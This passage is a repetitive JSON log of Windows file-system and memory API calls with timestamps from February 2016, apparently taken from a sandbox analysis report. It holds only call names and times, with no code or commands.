"filesystem", "timestamp": "2016-02-16 17:41:46,569", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,569", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,569", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,569", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,569", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,569", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,579", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,579", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,579", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,579", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,579", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,579", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,579", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,589", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,589", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,589", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,589", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:46,589", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,589", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,589", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,599", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,599", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,599", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,599", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,599", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,599", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,599", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,599", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,609", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,609", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,609", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,609", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,609", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,619", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,619", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,619", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,619", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:46,619", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,619", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,619", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,619", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,629", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,629", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,629", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,629", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,629", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,629", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,629", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,629", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,629", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,629", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,639", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,639", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,639", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,639", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,639", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,639", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:46,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,639", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,649", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,649", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,649", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,649", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,649", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,659", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,659", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,659", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,659", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,659", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,659", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,669", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,669", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,669", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,669", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,669", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,669", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,669", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,669", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,679", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,679", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,679", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,679", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,679", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,679", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,679", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,679", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,679", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,679", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,679", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,689", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,689", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,689", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,689", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,689", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,689", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,689", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,689", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:46,699", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,699", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,699", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,699", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,699", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,699", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,699", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,699", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,699", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,709", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,709", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,709", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,709", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,709", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,709", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,709", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,709", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,719", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,719", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,719", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:46,719", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,719", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,719", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,719", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,719", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,719", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,729", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,729", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,729", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,729", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,729", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,729", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,729", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,729", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,729", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,729", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,739", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,739", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,739", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:46,739", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,739", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,739", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,739", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,739", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,749", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,749", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,749", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,749", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,749", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,749", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,749", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,749", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,749", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,749", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,759", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,759", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,759", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,759", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,759", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:46,759", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,759", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,759", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,769", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,769", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,769", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,769", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,769", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,769", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,769", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,769", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,769", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,779", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,779", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,779", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,779", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,779", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,779", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,779", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,779", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,779", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,779", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,779", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,789", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,789", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,789", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,789", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,789", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,789", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,789", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,789", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,789", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,789", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,789", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,799", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,799", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,799", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,799", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,799", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,799", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,799", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,799", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,799", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,809", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,809", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,809", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,809", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,809", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,809", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,809", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,809", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,809", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,819", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,819", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,819", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,819", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,819", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,819", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,819", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,819", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,829", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,829", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,839", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,839", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,839", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,839", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,839", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,839", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,839", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,839", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,839", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,850", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,850", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,850", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,850", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:46,850", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,850", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,850", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,850", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,850", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,850", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,850", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,860", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,860", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,860", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,860", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,860", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,860", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,860", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,860", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,870", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,870", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,870", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,870", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,870", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,870", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:46,870", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,870", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,880", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,880", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,880", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,880", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,880", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,880", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,880", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,880", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,880", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,880", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,880", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,890", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,890", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,890", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,890", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,890", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,890", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,890", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,890", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:46,890", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,890", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,900", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,900", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,900", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,900", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,900", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,900", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,900", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,900", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,900", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,900", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,910", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,910", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,910", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,910", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,910", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,910", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,910", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,910", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,910", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,920", 
